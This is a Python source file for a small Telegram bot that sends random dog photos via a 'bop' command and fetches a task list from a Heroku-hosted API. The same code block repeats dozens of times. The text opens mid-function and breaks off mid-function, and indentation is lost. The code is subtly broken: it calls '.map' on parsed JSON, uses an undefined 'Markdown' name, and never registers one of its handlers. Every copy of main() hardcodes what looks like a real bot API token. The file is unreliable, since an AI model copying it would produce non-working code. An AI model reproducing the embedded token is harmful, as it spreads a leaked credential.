response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
